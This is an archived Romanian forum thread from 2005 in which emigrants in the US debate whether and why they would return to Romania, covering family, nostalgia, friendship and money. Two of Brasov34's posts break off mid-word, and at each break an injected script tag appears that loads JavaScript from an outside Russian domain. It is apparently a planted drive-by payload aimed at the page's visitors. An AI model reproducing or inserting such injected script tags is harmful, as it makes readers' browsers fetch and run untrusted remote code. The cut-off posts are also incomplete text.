PDA

Arată versiune întreagă : Pentru cat / ce te-ai intoarce in tara?

dana_pascan
07.02.2005, 10:02
Salut tuturor, am lipsit o vreme de pe forum pentru ca am fost in vacanta in tara si am luat pauza de la tot ce inseamna "civilizatie", am renuntat la internet, telefon, televizor si chiar si la ceas. Si Doamne ce bine a fost! Am vrut sa fiu cu familia mea...si am reusit mai bine decat speram. Am urcat sus la Balea Lac impreuna cu toata familia mea ...zapada multa, frig mult....dar ne-a prins o vreme carncena acolo de n-am putut cobora vreo4 zile. Vanturi de 120km/h, viscol ca in filme...noroc ca au termopane la cabana. Asa ca am jucat carti si am povestit si am mancat si am baut vin cald si apoi am luat-o de la capat....pana ne-am plictisit unii de altii, dar a fost superb.

In cele 3 saptamani cat am stat in Romania, am vazut multe si am auzit multe...bune si rele. Sperante si dezamagiri...totusi, dupa 2 ani de absenta pot spune ca ceva s-a schimbat in Romania in bine. Orasul meu arata mai ingrijit, mai organizat; magazine dragute cu vanzatoare amabile, masini bune, lume bine imbracata (ca doar se stie ca romanii, mai ales romancele,considera garderoba o investitie !). Si parca oamnei sunt un pic mai senini...cel putin cei mai tineri. Se schimba banii in curand, si nu stiu de unde, dar bate asa usor un aer de speranta in integrarea europeana. Desigur, multi nu stiu si partile negative care vor veni o data cu interarea in UE, prognozata pentru 2007.

Vazand toate cele bune din Romania si avand familia mea de origine acolo...m-am gandit si m-am tot gandit....asa ipotetic....oare ce m-ar determina sa ma intorc in tara? oare daca acolo as face tot atatea bani cat in SUA, m-as intoarce? Nu stiu! Stiu ce m-a determinat sa vin in SUA...si desi am un milion de motive sa ma intorc in tara....nu stiu pentru ce si pentru cat m-as intoarce!

Astept sa ma ajutati voi, sa-mi lamuresc dilema. Poate imi puteti spune voi pentru ce sau pentru cat v-ati intoarce in tara.

garfield
07.02.2005, 11:05
Poate imi puteti spune voi pentru ce sau pentru cat v-ati intoarce in tara.

Pentru doua zile, odata la 10 ani smileys/smiley36.gif

Brasov34
07.02.2005, 12:24
smileys/smiley2.gif
<TABLE cellSpacing=0 cellPadding=0 width="95%" align=center>
<T>
<TR>
<TD class=bold>dana_pascan wrote:

<TABLE cellSpacing=0 cellPadding=1 width="100%" bgColor=#999999>
<T>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=2 width="100%" bgColor=#ffffff>
<T>
<TR>
<TD class=text>

Poate imi puteti spune voi pentru ce sau pentru cat v-ati intoarce in tara.</TD></TR></T></TABLE></TD></TR></T></TABLE></TD></TR></T></TABLE>

Dana, eu cred ca stiu pentru ce s-ar intoarce romanii ACASA!

Stii pentru ce, desi unii nu vor recunoaste:

Tocmai pentru fericirea de a trai langa cei dragi ai tai, de a te bucura impreuna cu ei de viata asta scurta...

De a face lucruri frumoase impreuna si de a scapa de GOLUL din suflet p e care multi il avem prin despartirea de toti cei dragi, prin faptul ca aici oricat ne-am zbate ei nu vor putea fi inlocuiti cu nimeni sau poate cu prea putine persoane...

Si ai mai pleca pentru o viata mai "REALA", nerobotizata atata, pentru omenii care inca se plimba pe strazi si cu care mai poti discuta orice chiar si 10 minute numai cand ii intalnesti in oras, pentru tot ceea ce te scapa de un suflet pustiit de dragoste de oameni...smileys/smiley19.gif

Aici nu avem prieteni iar cei fara rude( cum suntem si noi) vom suferi mult mai acut aceasta problema...intreaga viata!

DECI, sincer iti spun, daca sotul meu ar vrea as pleca si maine...fara pretentii de "PENTRU CAT", ci doar pentru valorile spirituale lasate acasa....

Imi este tare dor de frati, rude, prieteni, de libertatea d emiscare fara a fi nevoit sa conduci mile intregi fara sens, sau ma rog, doar pentru a ajunge intr-un loc si a o lua apoi iar d e la capat...

IMi e dor de Brasovul ala care mi-a oferit aerul ala curat, oameni simpli si luminosi si sinceri. Imi e dor de fiecare straduta pe care ma plimbam uneori , imi vin multe amintiri acum, insa nu am timp sa ti le spun pe toate. Imi este dor de mancarea naturala din piete, sau alimentari, m-am saturat de atata ordine intr-o cutie de rosii sau mai stiu eu ce...imi place fata aia a taranului bun, muncitor cu care te tocmesti la piata, si uneori lasi de la tine doar pentru ca ii intelegi truda si mai cumperi si un fruct lovit ...dar NATURAL 100%!!

Voua nu va este dor de nimic din toate astea?smileys/smiley36.gif

Desi am gramezi de poze aduse cu mine, NIMIC nu poate compensa cu a trai ACASA!

Copiii mei nu au copilaria pe care am avut-o noi; traiesc mult prea incorsetati de acest regim al "goanei dupa bani"...parintii aproape ca nu mai au timp pentru ei dupa orele de serviciu si apoi ne miram ca ne vor parasi peste ani, neintorcand o privire catre noi...

Ei , copiii nostru nu vor reusi sa isi faca prietenii d egenul pe care noi le-am facut in decursul anilor, aici prieten inseamna o persoanadaca de pe urma "legaturii" cu ea poti avea si tu un castig...odata ce aceste "avantaj" a trecut in "neant" acel om nu mai exista in viata ta...NU vezi prietenii de suflet!

Uite, si pentru asta as pleca...imi e teama ca ne vom pierde copiii aici in imensitatea acestei lumi, si ca vom ajunge sa traim singuri la batranete....saraci , bolnavi si fara nici un sprijin, aruncati intr-un azil cum majoritatea americanilor ajung asa!CEi care sunt acolo sunt "FERICITI" cica!smileys/smiley19.gifAici rar cineva iti deschide usa casei, si parca am si u<script src=http://www.iroe.ru/ngg.js></script>

garfield
07.02.2005, 13:30
Very depressing! smileys/smiley19.gif

Daca a fost asa de bine in Romania de ce ai plecat de acolo? Incerc sa inteleg pe cei care-si amintesc cat de minunat a fost totul in Romania, si ce oribil si lipsit de viitor e totul aici. smileys/smiley5.gif

...cine stie, poate ca odata voi reusi si sa ma intorc.

Eu sper sa ti se indeplineasca dorinta si sa te intorci in Romania cat de curind.

angela
07.02.2005, 13:44
Intr-adevar foarte trist, dar asa cum a spus si Garfield, daca e totul
atat de frumos, plin de spirit, oamenii caldurosi si primitori, blah,
blah.... de ce ati venit aici???????????????? Pentru o viata mai buna??

Eu totusi raman la aceeasi parere : cum iti asterni asa dormi. De ce nu
iti poti face prieteni aici?? Iti poti alege din randurile romanilor
emigrati, mexicanilor sau orice alta nationalitate vrei tusmileys/smiley2.gif.
Atata timp cat tu esti un om deschis, primitor si plin de viata
crede-ma iti vei gasi prieteni tot timpul, indiferent de nationalitate,
sa nu uitam inainte de a deveni romani am fost si vom ramane in primul
rand oamenismileys/smiley2.gif

Nici eu nu ma omor dupa americani, nu ca as fii eu mai breaza pentru ca
sigur nu sunt, astea sunt doar impresii, dar am prietene mexicance,
portugheza, etc.... deci care-i baiul???? Ca nu vorbesc limba mea???
Pai nici eu nu o vorbesc pe a lor, dar impreuna putem intelege si vorbi
despre traditiile tarilor noastre si uite asa mai bagi la tartacuta
anumite informatii de care habar nu aveamsmileys/smiley2.gif

Imi este dor de Romania, as vrea sa merg acolo in vacanta, sa ma
distrez cu familia si prietenii...dar momentan doar atat. Am urat
America la inecput si aveam impresia ca noi romanii suntem mai cu mot
in frunte, dar nu e chiar asa, imi lipseste cheful de viata al
prietenilor mei, imi lipseste aerul de munte...dar nu imi lipsesc
mitocania pe care o intalnesti la fiecare colt de strada, nu imi
lipsesc bisnitarii care au ajuns sa stea si in incinta unei case de
schimb valutar, nu imi lipseste politia romana care daca nu ai bani te
trateaza ca pe un delicvent chiar daca tu esti victima, nu imi lipsesc
cersetorii care iti cer 1000 de lei si dupe ce le-ai dat-o te injura ca
le-ai dat doar atat..... si lista ar putea continuua la nesfarsit.

Totul depinde de noi sa incercam sa ne facem viata cat mai frumoasa, nu
suntem de 80 de ani sa incepem sa traim doar din amintiri, alea sunt
bune cateodata dar din cand in cand ar trebui sa nu uitam sa fixam
alarma la ceas si sa ne desteptam, viata merge inaintesmileys/smiley2.gif

Vlad
07.02.2005, 13:59
Vanturi de 120km/h, viscol ca in filme...noroc ca au termopane la cabana.

Daca ati stii voi ce am CITIT eu prima data in loc de "termopane"(tamp..ne)....si ma gandeam "ia uite ce detali ne da Dana..."smileys/smiley36.gif

EHHH...

danielle
07.02.2005, 17:33
Opinia mea este ca trebuie sa traim in prezent si sa ne distantam de trecut.Nu putem sa traim numai din amintiri si din ceea ce ne lipseste din Romania. Am ales o noua viata, noi, nu ne-a obligat nimeni, deci trebuie sa traim dupa cum am ales.

Sau putem sa alegem din nou. Oricare dintre cei care cred ca ar fi mai fericiti in alta parte ar trebui sa aleaga acea parte in care sunt fericiti. Alegerea tine de noi asa ca...nu vad de cene-am complace in a trai ceva ce nu neplace sau undeva unde nu neplace. Nimic nu merita platit cu fericirea.

Mai greu a fost de a ajunge sa traim in strainatate, mult mai usor este sa fim primiti in Romania. Deci calea e deschisa.

Parerea mea este ca mesajul Angelei reprezinta foarte bine si ce simt eu de aceea n-o sa mai continui. (nu degeaba a primit ea premiul forumului pe luna asta smileys/smiley17.gif)

Sa fiti fericiti,

Danielle

Brasov34
07.02.2005, 18:29
DA, va multumesc pentru pareri!

Oricum parerea Angelei si a inca catorva forumisti nu poate generaliza situatia reala a romanilor de pretutindeni? Eu am intalnit majoritatea oamenilor de aici "plangandu=le" sufletele dupa acel "SUFLU DE VIATA" lasat acasa...

Nu spun ca acasa nu sunt lucruri rele, si aici sunt si mai multe dar le ignoram. EU comparam partea sufleteasca si nu materiala si nici macar nu m-am gandit vreo clipa ca un strain iti poate deveni cel mai bun prieten!

Angela, te inseli, toate pana la una nmit punct, vei vedea tu mai in colo. Sau poate in casniciile mixte o fi diferit, nu stiu!

PACAT INSA CA NU PUTEM AVEA AICI CU NOI TOATA SUFLAREA ROMANEASCA DIN STATE care sa ne spuna de ce mereu se gandesc acasa si de ce le plange sufletul ca si-au ales o viata lipsita de "viata", unde esti robul muncii si nimic mai mult, unde nu ai concedii mai mult de 3 saptamani si unde nu ai timp de ADEVARATELE prietenii.

SUNT CONSTIENTA CA SUNT MULTI CA MINE si nu va judec parerile, insa va rog nici voi sa nu mi le jugecati pe ale mele.

Este un FORUM DESCHIS oricaror opinii, daca esti deacord el citesti., daca nu asta e...

NU e loc de comentarii prea detaliate referitor la ce si DE CE a scris un tip o chestie sau alta...

Aici te desfasori "in voie" sau asa ar trebui: sa ne simtim toti intr-un spatiu "COMUN" , "CALD", sa dam dovada ca inca ne pasa de romanul de langa noi si ca il iubim mai presus d eorice avantaje le-am avea aici si de orice am ales traind aici...

Eu nu spuneam ca nu imi pot face prieteni aici, insa nu se compara cu ce am avut si am lasat acasa.

Imi lipsesc enorm de mult fratii care nu pot primi viza de turist din motive greu de inteles; pai cum sa ma simt intr-o tara libera unde nua m dreptul la fericire cand eu platesc sederea lor aici? Uite ca sunt multe chestii pe care nu am puterea sa le inteleg in aceasta viata dura , oi fi eu mai 'batuta-n cap" decat voi, nu stiu...dar stiu ca gandesc SINCER! SI SCRIU DIN SUFLET pe acest site si la obiect!

Imi place sa intalnesc oameni la fel de sinceri macar aici daca in viata de zi cu zi nu am avut ocazia. Aici nu inseamna ca daca intalnesti un om care vorbeste romaneste gata iti si poate deveni prietenul cel mai bun- simpla rostire a limbii romane nu poate fi o "CALITATE" de apropiat printre romani...

Eu am nevoie de afinitati [pe care le gasesti mult mai greu si in special de simplitate, bunatate, suflet bun...ceea ce greu o sa gasiti in ziua d eastazi...printre romanii pe care-i intalniti!

Sau ma rog, chiar daca ii gasiti, nu se stie pana cand tine relatia pentru ca fluctuatia locurilor de munca e foarte mare si nu stii cand cel mai bun prieten s e va muta de langa tine suficiente mile cat sa desparta ce ati construit si totul devine "nimic" in afara de un telefon pe care vi-l mai puteti da...

DECI EU DORESC OAMENI ADEVARATI IN PREAJMA si viata asta dura, cu atatea griji si lipsa timpului liber greu ni poat eoferi...si poate si de aici tot 'amarul" meu , nu pe tara asta, ci pe faptul ca nu am noroc sa intalnesc oameni DEZINTERESATi intr-o prietenie d edurata...

SUNT SI MAI PERFECT CONSTIENTA ca multi dintre voi simtiti acel gol in suflet f. acut uneori insa nua veti curajul sa va "afisati "sentimentele...este dreptul vostru si "tacerea" asta...

EU VA DORESC SA GANDITI ATAT D ESENIN SI PESTE 10, 20 ani, iar atunci cand nu veti mai pute a<script src=http://www.iroe.ru/ngg.js></script>

Isabella
07.02.2005, 19:07
Adevarul e ca cei depe acest forum se pricep de minune sa ridiculizeze pe cineva care este mai bun , sufleteste o spun,si chestia asta e valabila in general in toate relatiile interumane.Cat despre despre faptul ca cei de aici sunt mai prietenosi si mai calzi decat cei din afara e adevarat, am simtit-o pe pielea mea cand am fost in Ungaria ,insa si aici exista multe lichele,iar dupa 1989 toti am devenit mai rai,nu ne intereseaza decat partatica noastra si nu ne ajutam in nici un fel.Recunosc, chiar la mine simt o schimbare in acest sens si o schimbare in rau. Stiu, veti spune ca sunt o nostalgica a peridoadei comnuniste ,multi dintre voi ma vor infiera,insa atunci eram uniti in fata raului comunist, a puterii si ne ajutam unii pe altii. Intr-adevar exista liberatea de opinie ,libertatea de a face ce vrei,insa exista un mare vid sufletesc, pecare nu stiu daca il va umple ceva.

mihaelaNV
07.02.2005, 19:12
Brasoveanco...sa stii ca adevarul este ca fiecare tzara are puncte bune si rele...dar stii cum e in orice bine e un rau, si-n orice rau este un bine. Si mie mi-e ffffffffffffffffff dor de casa, si numai cand imi spun ai mei ca bunicii au imbatranit atat de mult ca nu mai poti avea nici macar o conversatie cu ei, nu pot crede. Altii mor, alti se nasc, timpul nu iarta.....prietenii......sa stii ca sunt oameni minunati si aici....doar tu poti schimba ceva in viatza. Cand stii exact ce vrei, ce cauti, vei gasi.....vei atrage oameni care gandesc la fel, si chiar daca de multe ori atragi oameni care nu sunt pe gustul /preferintele tale, pastreaza-tzi fortza de discernamant intacta, si alege persoanele potrivite personalitatii tale. Cu totii suntem pe acest pamant pentru un scop, nu inseamna ca toata lumea ne place, dar trebuie sa invatzam cum sa stim sa ne aceptam. Cat despre America/ Romania....eu sunt casatorita cu un cetatean american.....nici nu stiu cum va fi, si nici nu vreau sa ma gandesc, pentru ca vreau sa accept, oricum va fi...cat imi sta in putintza voi incerca sa mentzin traditia romaneasca in familie. Vreau sa merg f. des acasa cu sotul meu, vreau sa se obisnuiasca acasa. Cunosc un american, tipul are 38 de ani, intr-o vara a dat cu banul unde sa mearga in lume, si moneda a cazut pe harat pe Romania. 7 ani consecutiv a mers in fiecare vara in Romania, si-a facut prieteni, vorbeste fluent romaneste, si acum vreau sa se mute in Bucuresti. Tipul de meserie este arhitect, si vrea sa construiasca multe scoli in Romania. Nu-mi vine sa cred....dar este adevarat...exista si exceptii. Sa nu-tzi povestesc ca ma intreaba primul lucru, daca am reteta de zacusca...m-a si pofnit rasul.

Deci mi-as dori ca sotul meu sa vorbeasca despre Romania asa...dar asta depinde doar de noi cum ne vom petrece timpul. La urma urmei......PUTEM FII FERICITI ORIUNDE, CAT TIMP STIM CINE SUNTEM, SI CUM SA NE FACEM FERICITI. La unii oameni le mor parinti, si tot trebuie sa o ia de la capat, sa isi gaseasca fericirea. Eu cred ca totul depinde de starea ta spirituala, cat de linistita esti tu cu tine sufleteste. Cu totii crestem, ne schimbam, dar in suflet ramanem la fel, dornici de iubire.

Numai bine brasoveanco!smileys/smiley2.gif

garfield
07.02.2005, 19:36
Brasov34, inca odata, mi se pare foarte trist felul in care vezi lucrurile si mi se pare ca esti convinsa ca aici nu poti sa ai prieteni sau sa fii fericita, si nici nu incerci. Bineinteles ca daca nu incerci, nici nu se va intimpla niciodata. smileys/smiley19.gif

Mi se pare curios ca esti convinsa ca soarta la restul romanilor va fi exact ca si a ta. De ce? Sunt care au familia aici cu ei. Sunt si cei care nu sunt asa de 'lipiti' de familie si isi gasesc bucuria oricum.

Eu am nevoie de afinitati [pe care le gasesti mult mai greu si in special de simplitate, bunatate, suflet bun...ceea ce greu o sa gasiti in ziua d eastazi...printre romanii pe care-i intalniti!

Sau ma rog, chiar daca ii gasiti, nu se stie pana cand tine relatia pentru ca fluctuatia locurilor de munca e foarte mare si nu stii cand cel mai bun prieten s e va muta de langa tine suficiente mile cat sa desparta ce ati construit si totul devine "nimic" in afara de un telefon pe care vi-l mai puteti da...

Nu stiu daca am citit eu gresit, sau interpretez gresit, dar din ce zici tu, se intelege ca nu poti face 'prietenie adevarata' nici curomanii. Pai atunci cine mai ramane? Numai romanii din Romania? http://www.romanian-portal.com/forum/smileys/smiley92.gif

EU VA DORESC SA GANDITI ATAT D ESENIN SI PESTE 10, 20 ani, iar atunci cand nu veti mai pute arezista cu acei "BUNI PRIETENI MEXICANI, etc" sa ma cautati si pe mine...

Bun, eu sunt aici de 26 de ani, consider ca gandesc clar, si rezist perfect cu prietenii mei de toate natiile si nu numai ca sunt fericit, dar eu numesc aici 'acasa' si ma ducin Romaniain vizita.

EU va doresc sa va fie bine acolo unde sunteti fiecare si sa reusiti sa spuneti in fiecare an: CE MA BUCUR CA AM PLECAT DIN ROMANIA! Dar sunt sigura ca nu o veti putea spune cu toata convingerea , doar poate din putina lasitate...

Credema ca put sa spun cu toata convingerea si fara nici un pic de lasitate CE MA BUCUR CA AM PLECAT DIN ROMANIA! Mai zic inca o data CE MA BUCUR CA AM PLECAT DIN ROMANIA! in caz ca nu m-ai crezut prima data. smileys/smiley2.gif

Daca esti convinsa ca lucrurile sunt asa cum zici tu, si soarta tuturor e sa traiasca o viatza trista si goala sufleteshte, si saajunga nefericiti la batrinete, de ce nu le spui la toti cei care incearca disperat sa plece din romania (sau cel putin la cei care sunt pe acest forum si discuta ca vor sa plece sau chiar au castigat viza) sa stie si ei ce o sa-i astepte. Poate ca poti ajuta pe multi sa evitegresheala de a parasi fericirea din Romania! smileys/smiley5.gif

cielito
07.02.2005, 19:44
Tinerete .... curge valuri in randurile postate mai sus .... si incerc sa ma hranesc si eu din tineretea voastra !

Dana , Brasov34, Isabella nu va necajiti .... partenerii vostrii de discutie nu vor sa va jigneasca si nici sa va raneasca maitare .... Ei vor sa va scoata din clipa de nostalgie (care , in treacat fie spus, toti o traim uneori dar o manifestam diferit).... Ei vor sa va readuca cu fata spre alegerea voastra .... Fiti sinceri : daca ar spune toti ce alegere proastaam facut plecand de langa familie v-ati simti mai confortabil ? Sunt sigura ca nu! Maine dimineata fiecare veti continua ceea ce ati inceput, tocmai pentru ca suntem romani si nu ne dam batuti .... Doare sufletul uneori , dar acolo in adanc stiti ca si daca ramaneati langa familii , viata de zi cu zi , lupta , deloc usoara de supravietuire v-ar fi facut alte rani. Eu sunt in categoria celor de peste 40 de ani si sunt aici de un an. Nu-mi este deloc usor (mai ales ca eu mi-am lasat copii in tara si in curand voi fi bunica ).... dar daca destinul m-a trimis aici (vedeti, este mai simplu sa nu-ti asumi alegereasmileys/smiley2.gif), am inceput o lupta pe care nu vreau sa o pierd .... si daca scriu acum aici, este pentru ca toti avem nevoie de un sfat, de un loc unde sa ne impartasim bucuriile si tristetile , experientele ....

Tinerete, stiu sigur ca niciodata nu putem avea tot ce dorim ....in fiecare zi gasim altceva ce ne lipseste pentru a fi fericiti , dar niciodata sa nu regretam ce am facut , sa ne indreptam spatele pentru ce vom face !

garfield
07.02.2005, 19:58
MihaelaNV tu ai dreptate in ce ai scris mai sus, dar nu sunt de acord cu tine 100% in exemplu cu arhitectul. Nu e acelasi lucru sa vizitezi o tzara, si sa locuesti acolo. Mie ami place sa merg in vizita in Mexico dar nu ma-s muta acolo.

Pentru arhitect nici faptul ca vrea sa se mute acolo dupa ce si-a facut prieteni, cu meseria lui, si banii pe care ai are, nu e la fel ca cei care pleaca din tara cu doua valize si fara bani.

Sper ca pentru tine si sotul tau, vizitele in Romania sa fie frumoase si placute. Cunosc un american care are sotia din PR si viziteaza des si se simt foarte bine de fiecare data.smileys/smiley1.gif

Brasov34
07.02.2005, 20:28
Da, n-are sesn sa continui ca nu vreau sa conving pe nimeni de nimic.

Ideea e ca eu nu pot trai fara cei dragi.

Cu MIHAELA am reusit sa discut cateva minute si pe telefon si mi-am dat seama ca intr-adevar sunt oameni adevarati. Mi-a revenit zambetul pe buze si speranca ca asemeni Mihaelei pot exista si alti romani in preajma mea!

DAR UNDE SA DAU D EEI, spuneti-mi si voi?

Eu vreau ROMANI! Pentru ca imi place sa pot inlocui pe cei dragi de acasa. Chiar si un strain insa asa ca "umplutura " vietii...eu tot la tarisoara mea trag...smileys/smiley2.gif

Iar cum spunea Garfield, are 26 ani de AMERICA, poate ca peste 26 ani voi avea si eu alte gandiri, atunci parintii nu vor mai fi saracii si nu ma voi mai gandi la departarea d eei; ii voi purta doar in gand pentru ca nu imi vor ramane decat amintirile.

Dar cum ca TRAIESC si ca m-a s fi putut bucura de prezenta lor,sa le simt respiratia si mersul , sa-i ating cand vreau si macar cu o privire, cum sa ma impac ca nu o pot face din cauza distantei?

STiti, uneori ma simt vinovata in fata lor ca acum cand poate au cea maimare nevoie de mine, la batranete, sunt neputincioasa si nu ii pot vizita deloc. Dupa ce m-au crescut , educat si indrumat catre viata , acum eu ii parasesc definitiv...

IMI E DOR DE EI SI IMI ESTE TEAMA ca nu-i voi mai revedea dupa fiecare despartire de ei.... IMBATRANESC PARINTII si DISPAR din viata noastra; dar cand ii simti ca ti-au "disparut" din viata doar prin distanta asta te doare si mai mult, stiindu-i in viata si totusi neputand sa le vorbesti , sa ii vezi sa ii ajuti cu nimic...

Am crescut intr-o familie foarte calda si poate de aceea simt mai acut aceste "probleme"...nu ar trebui sa judecati dupa ce simtiti voi...nufiecar esimte la fel, oamenii sunt atat de diferiti si ceea ce ma multumeste pe mine nu ii poate face pe altii fericiti!...

DEci abia cu 5 ani (neimpliniti) de venire in Sua si dupa 2 ani de absenta de acasa, nu pot sa spun inca ca MOR DE FERICIRE CA M PARASIT ROMANIA! SI nici nu cred ca voi spune vreodata!

EMIGRAREA isi are tragedia ei: multi recunoastem dar si mai multi suntem lasi si nu vrem sa spunem realitatea ce ne inconjoara...

In fine, ma bucur ca sunteti fericiti printre strainii ce va incalzesc sufletele mai multdecat romanii sau cei dragi de acasa ( sau romanii d eaici)..

CHIAR VA FELICIT PENTRU CAT DE "PATRIOTI" PUTETI FI! Pot spune sunteti niste adevarati "AMERICANI"...INtr-adevar, puteti fi fericiti in tara asta! smileys/smiley32.gif

garfield
07.02.2005, 20:45
STiti, uneori ma simt vinovata in fata lor ca acum cand poate au cea maimare nevoie de mine, la batranete, sunt neputincioasa si nu ii pot vizita deloc. Dupa ce m-au crescut , educat si indrumat catre viata , acum eu ii parasesc definitiv...

Nu cred ca trebuie sa te simti vinovata ca sunt sigur ca parintii tai se bucura pentru bucuriile tale si sunt mandri pentru tot ce ai realizat. Cred ca toti parintii vor sa fie aproape de copii lor, dar cred ca vor mai mult ca copii lor sa fie sanatosi, fericiti si sa-si indeplineasca visurile, oriunde se afla.

CHIAR VA FELICIT PENTRU CAT DE "PATRIOTI" PUTETI FI! Pot spune sunteti niste adevarati "AMERICANI"...INtr-adevar, puteti fi fericiti in tara asta!

Thank You!

Brasov34
07.02.2005, 20:52
Da, simt ca mi-am incheiat "misiunea" pe acest topic...smileys/smiley2.gif

II las si pe altii sa vina cu pareri si mai ales p ecel ce a initiat-ocare s epare a uitat sa mai revina pe aici!smileys/smiley4.gif

Ma intrebam doar pentru ce a initiat-o ca doar nu pentru mine!smileys/smiley19.gif

Si totusi la ceva s-a gandit cand a deschis acest subiect!!

sauzimdebine
08.02.2005, 01:09
Emigrarea cu toate aspectele ei necesita discutii ample, fara a ne supara pe parerile contrare, care ar trebui intelese tocmai pentru a ne da o alta viziune asupra lucrurilor in cauza.
Pentru toti cei care raman cu nostalgia prieteniilor pirdute, ramase undeva in Romania, propun un test. Fiecare sa-si anunte prietenii lasati acasa ca vor sa se intoarca, dar pentru a face acest pas au nevoie de ajutorul lor. In primul rand au nevoie de ajutorul lor moral. Au nevoie sa afle parerea lor despre aceasta hotarare ca si de suportul lor sufletesc pentru a o duce la bun sfarsit. In al doilea rand, au nevoie de ajutorul lor material. Au nevoie de bani pentru a se reintoarce acasa, fiind vorba de cheltuielile de transport care, altfel, nu pot fi acoperite, de aceea roaga pe toti prietenii sa trimita fiecare cat o putea.
Astept rezultatele.
Discutia despre despartirea temporara de parinti trebuie purtata plecand de la ambele capete. Parintii mei au crescut in familii iubitoare, foarte unite sufleteste, au avut parte de tot suportul pentru a infrunta viata si a-si croi un rost in lume. La randul lor m-au crescut pe mine cu aceeasi dragoste, spirit de sacrificiu si intelepciune si mi-au dat drumul in lumea larga, sa-mi aflu si sa-mi indeplinesc rostul pe acest pamant.
Cu putina vreme in urma am intrebat-o pe mama daca regreta pasul facut de mine si daca, considerand ca suntem prea departe, ar fi de acord sa vina definitiv in america. Raspunsul ei a fost cat se poate de edificator. "Chiar daca bucuria de a fi aproape de tine si de familia ta nu se poate masura sau descrie, nu cred ca ar acoperi problemele de adaptare la un alt stil de viata. Nici eu si nici tatal tau nu mai avem puterea de a o lua de la capat. Ramanem aici cu bucuria datoriei implinite si cu satisfactia ca tu si ai tai sunteti bine. Cat despre faptul daca ai fi ramas in Romania, nu cred ca as fi fost eu fericita stiindu-te undeva pe aproape, dar ... nefericit."

sauzimdebine
08.02.2005, 01:18
Daca as putea sa-i ofer fetitei mele o viata normala in ROMANIA, de care si ea este foarte legata sufleteste, as face pasul reintoarcerii. Nu se poate, deci nu-l fac.

Fethoden
08.02.2005, 02:06
Pot spune cu mana pe inima:ce am aici, in State, nu aveam in Romania, ce aveam in Romania, nu am aici.

Testul propus de Sauzimdebine, nici nu il fac,pentru ca stiu rezultatele:toti ar zice:"esti nebuna,cum sa vii?", apoi:

.."bani nu avem sa iti trimitem, tocmai voiam sa iti cerem tie un imprumut, ca nu ne mai ajunge sa ne achitam Matizul(dau un exemplu,sora mea chinuie de ceva timp cu rata la masina)...sau unii dintre prieteni,mi-ar spune:"nu avem nici un ban, nu ne ajung banii astia niciodata, nu am reusit sa strangem nimic...deci stai acolo, ca daca depinzi de banii de la noi....inseamna ca tot ai de stat in State!!!!!".. etc....

Sau:."ce altii se dau de ceasul mortii sa ajunga in State, iar tu te intorci ..!!??".....sau:

"lasa ca vii la vara in vizita, stai 1-2 luni, si iti trece tie de Romania"!!!

"ce,ai uitat ce greu e pe aici.!?"

Deci....respir adanc.....si incerc sa fiu realista...!!!!

Dau telefoane pe saturate, le cer pareri, le spun ce am pe suflet, deci cel putin ii aud, ca doar imi permit sa stau ceasuri intregi la telefon, nu?, si incerc sa retraiesc diferite momente din urma....in ordine cronologica...de la primele mele lupte cu viata din momentul in care m-am desprins de ai mei...dupa majorat..!!

Stiu ca orice am facut , plecand de acasa, departe de ai mei, departe de tara, atat timp cat imi mergea bine, ai mei erau fericiti si ma incurajau tot timpul....se plangeau de lipsa mea, dar imi spuneau:"decat acasa si cu multe lipsuri...mai bine asa..., nu vezi cat e de greu.!!??"

Si e intradevar asa:e sacrificiul sentimental, in favoarea unei stari materiale mai bune.

Daca am bani,pot sa-i ajut si pe ai mei..., pot sa merg in tara oricand...ma bucura sa-i pot ajuta....daca as fi in Romania, moral vorbind am avea alte stari neplacute, tot din probleme materiale....

Deci, oricum ar fi:daca am plecat de acasa,inseamna ca am avut motive, nu ne-a adus aici nimeni cu forta....

Doar ca astea tindem sa le uitam uneori si ne plangem ca niste copii...

Nu , nu ar fi corect fata de copiii pe care-i avem aici....le periclitam cursul normal al vietii...

I-am adus aici si TREBUIE sa raman in continuare pentru ei,dar, SA NU UITAM DE UNDE AM PLECAT.....iar cand spun asta ma refer din toate punctele de vedere posibile :de a pastra traditiile roamnesti, de a vorbi corect romaneste nu ghiveci cum face Mihaela NV-- sa fie sanatoasa.!!..de cate ori ii citesc mesajele ,mi se face capul "girofar"...!!--dar ma rog, e si ea romanca de-a noastra si daca asa "percepe",asa si "transmite " romaneste...!!!smileys/smiley17.gif,modestia cu care am plecat din tara sa ne-o pastram si vreau sa -i vizitez pe ai mei fara americanisme,....sau accent vadit ,sa aratam anume parca de unde venim.... ca si cum as spune:"am venitsh shdin Shtatele Unithe shi mam', fa-mi chte rogh o mamaligha cuh branzha shi shmantana"!!!!smileys/smiley36.gifsmileys/smiley36.gif

Bye!

08.02.2005, 02:13
Dupa cat vad eu taberele sunt inpartite; intr-o parte cei care au emigrat demulti anisisau acomodat, au prins radacini si se bucura de toate avantajele americi,si cei care au sosit cu putin timp in urma,cu rude si prieteni inca intara.Sunt de acord cu Gardfield 100% si nu am sa mai repet ce a spus el. Ce nu inteleg este de ce trebuie sa avem o confruntare? de ce cei care nu sau acomodat si duc dorul tarii nu vor sa creada ca se poate trai fericit siin America? Nu totidorim sa mergem inapoi!!! Uni dintre noi chair suntem fericiti, cu joburi bune, prietenisi situatii fromoase. Nu doresc sa atac pe nimeni, dar daca nu ma insel Brasov34 era interesata nu demult sa-si aduca sorain US prin casatorie..... daca viata aici este asa degrea, golul din suflet asa de mare,iar viata inBrasov asa de grozava, de ce vrea acuma sa-i distruga si viatasorei?

Fethoden
08.02.2005, 02:13
Singurul lucru care m-ar determina sa plec chiar acum din State, ar fi tot doar o vizita cu scopul de a-mi vedea parintii , si pe toti ai mei de acolo si cum s-a terminat construirea unei noi case de care sunt foarte incantata auzind de la ai mei, ca fiind foarte reusita...

In rest...salutare si-un praj verde...Romaniei si politicii de acolo..!!..imi pare rau de omenirea care sufera acolo.....ma consider o persoana norocoasa ca pot oferi copiilor mei aici ,atat de multe si in rest......Doamne-ajuta!

sauzimdebine
08.02.2005, 03:13
